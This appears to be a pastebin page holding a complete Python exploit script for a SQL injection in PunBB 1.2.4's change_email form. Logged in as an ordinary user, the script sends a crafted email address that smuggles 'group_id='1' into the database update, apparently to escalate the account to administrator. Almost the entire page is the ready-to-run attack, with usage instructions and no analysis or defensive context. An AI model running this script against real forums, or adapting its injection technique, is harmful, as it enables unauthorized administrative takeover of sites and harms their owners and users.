This site is developed to XHTML and CSS2 W3C standards.
If you see this paragraph, your browser does not support those standards and you
need to upgrade. Visit WaSP
for a variety of options.
Paste #709
Posted by: rega
Posted on: 2026-07-02 16:56:07
Age: 5 hrs ago
Views: 10
#!/usr/bin/env python3
import requests
import sys
import re
from urllib.parse import urljoin
class Colors:
GREEN = '\033[92m'
BLUE = '\033[94m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
CYAN = '\033[96m'
RESET = '\033[0m'
def banner():
print(Colors.BOLD + Colors.CYAN + """
╔══════════════════════════════════════════════════════════════╗
║ PunBB 1.2.4 - change_email SQL Injection ║
║ ║
║ by www.downgrade-net.ru ║
╚══════════════════════════════════════════════════════════════╝
""" + Colors.RESET)
def success(msg):
print(Colors.GREEN + "[+] " + msg + Colors.RESET)
def info(msg):
print(Colors.BLUE + "[*] " + msg + Colors.RESET)
def warning(msg):
print(Colors.YELLOW + "[!] " + msg + Colors.RESET)
def error(msg):
print(Colors.RED + "[-] " + msg + Colors.RESET)
def main():
banner()
if len(sys.argv) < 6:
print(f"Usage: python3 {sys.argv[0]} <url> <username> <password> <email> <email domain>")
print(f"Example: python3 {sys.argv[0]} http://localhost user password user@domain.com domain.com")
sys.exit(1)
url = sys.argv[1].rstrip('/')
username = sys.argv[2]
password = sys.argv[3]
email = sys.argv[4]
domain = sys.argv[5]
s = requests.Session()
info("Logging in as normal user...")
login_data = {
'req_username': username,
'req_password': password,
'form_sent': '1'
}
r = s.post(urljoin(url, "/login.php?action=in"), data=login_data)
if r.status_code != 200 or "punbb_cookie" not in str(r.cookies):
error("Login failed!")
sys.exit(1)
success("Successfully logged in!")
info("Extracting user_id...")
r = s.get(urljoin(url, "/index.php"))
match = re.search(r'profile\.php\?id=(\d+)', r.text)
if match:
user_id = match.group(1)
success(f"User-ID found: {user_id}")
else:
error("Could not find user_id!")
sys.exit(1)
info("Creating payload...")
payload = f'"{email.split("@")[0]}"@{email.split("@")[1]}","\','
append = "group_id='1"
padding = " " * (50 - len(append) - len(payload))
final_email = payload + padding + append + f'"@{domain}'
info(f"Payload: {final_email[:70]}...")
success("Sending SQL Injection payload...")
change_data = {
'req_new_email': final_email,
'form_sent': '1'
}
r = s.post(urljoin(url, f"/profile.php?action=change_email&id={user_id}"), data=change_data)
print(Colors.BOLD + Colors.GREEN + "\n" + "="*65)
print(" EXPLOIT FINISHED SUCCESSFULLY!")
print("="*65 + Colors.RESET)
print(Colors.YELLOW + "Now check your email and click the confirmation link\n" + Colors.RESET)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
error("Interrupted by user")
except Exception as e:
error(f"Error: {e}")
Download raw |
Create new paste